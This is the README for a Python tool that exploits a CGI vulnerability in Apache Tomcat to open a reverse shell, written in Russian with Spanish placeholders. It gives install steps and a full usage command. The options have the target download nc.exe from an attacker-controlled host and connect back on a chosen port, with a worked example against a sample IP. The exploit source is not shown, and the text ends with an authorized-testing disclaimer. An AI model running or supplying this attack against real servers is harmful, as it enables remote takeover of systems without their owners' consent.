
Скрипт на Python, предназначенный для эксплуатации CGI-уязвимостей на серверах Apache Tomcat путем установления обратного shell-соединения.

requestsgit clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
-t, --target: IP-адрес цели с Apache Tomcat-i, --ip: IP-адрес атакующего, на котором размещен nc.exe-ncp, --nc-port: Порт для обратного shell-соединения-p, --port: Порт цели (по умолчанию: 8080)-sp, --server-port: Порт сервера для размещения nc.exe (по умолчанию: 80)-cgi, --cgi-script: Имя эксплуатируемого CGI-скрипта (по умолчанию: cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение. Автор и участники не несут ответственности за любое неправомерное использование или ущерб, причиненный данным скриптом. Всегда получайте надлежащее разрешение перед тестированием любой системы.